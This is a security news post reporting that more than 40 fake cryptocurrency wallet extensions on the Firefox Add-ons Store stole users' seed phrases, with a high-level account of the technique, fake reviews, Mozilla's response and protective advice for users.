Over 40 Firefox Extensions Caught Stealing Cryptocurrency

Red Dog Security

3 min read
Over 40 Firefox Extensions Caught Stealing Cryptocurrency

Security researchers have uncovered more than 40 malicious browser extensions on the official Firefox Add-ons Store, all disguised as legitimate cryptocurrency wallets. These fraudulent extensions were designed to steal users’ private keys, seed phrases, and sensitive wallet data, exposing victims to full asset compromise.

Key Findings

Fake Wallet Extensions

The rogue add-ons impersonated well-known crypto wallets, including:

  • MetaMask
  • Coinbase Wallet
  • Trust Wallet
  • Phantom
  • Exodus
  • OKX
  • Keplr
  • MyMonero

These extensions appeared polished, often copied directly from open-source versions of real wallets, but were injected with malicious code.

Campaign Timeline

  • Active Since: April 2025
  • Status: Ongoing
  • New uploads were detected as recently as last week, indicating that the operation is still active and evolving.

How the Attack Works

The malicious extensions were engineered to mimic real wallets in functionality and appearance while secretly harvesting sensitive data.

  • Cloned source code: Legitimate open-source wallet projects were used as the base.
  • Injected malware: Hidden event listeners (e.g., input or click) monitored user activity, looking for seed phrases or private keys (typically input strings over 30 characters).
  • Silent data theft: Captured data was silently exfiltrated to attacker-controlled servers.
  • Error dialogs were hidden using CSS (opacity: 0) to avoid alerting users to failed actions or back-end errors.

Fake Reviews & Ratings

Many of the extensions had hundreds of five-star reviews, grossly inconsistent with their actual installation numbers. In contrast, 1-star reviews often warned of scams—likely posted by victims after losing funds.

Mozilla’s Response

The issue was initially flagged by Koi Security, but many of the malicious extensions remained online at the time of public disclosure.

Mozilla’s Actions:

  • Claimed that dozens of extensions had been removed prior to the report
  • Acknowledged that additional extensions remain under review
  • Introduced a new fraud detection system to:
    • Generate risk profiles for crypto-related add-ons
    • Flag suspicious extensions for manual review before approval

Official Statement:

"We’re aware of attempts to abuse Firefox’s extension ecosystem to distribute cryptocurrency-stealing malware. We’ve improved our processes and tools to detect and remove such add-ons faster. Many extensions mentioned in Koi Security’s report were already taken down prior to publication, alongside dozens of others. We’re reviewing the remaining ones and continue working to protect Firefox users."

What Users Should Do

Immediate Actions:

  • Uninstall any suspicious wallet extensions, especially if they resemble the brands listed above.
  • Review extension ratings critically—a disproportionate number of 5-star reviews with low install counts is a red flag.
  • Avoid third-party downloads—only install wallet extensions directly from official project websites.
  • Audit wallet activity—if you’ve used a suspicious extension, move your funds to a new wallet with fresh seed phrases.

Why This Matters

Browser extensions are powerful—they operate with deep access to webpage content, including login fields, crypto interfaces, and secure APIs. This makes them a prime vector for digital theft, especially in self-custody environments where recovery options are limited.

Firefox’s open extension model encourages innovation but requires more robust vetting to protect users in high-risk categories like crypto.

Final Warning

Even in trusted browser ecosystems, malicious extensions can slip through. Always:

  • Verify the publisher
  • Avoid installing from search results
  • Cross-reference with official documentation

In crypto, one wrong click can cost everything.

Read more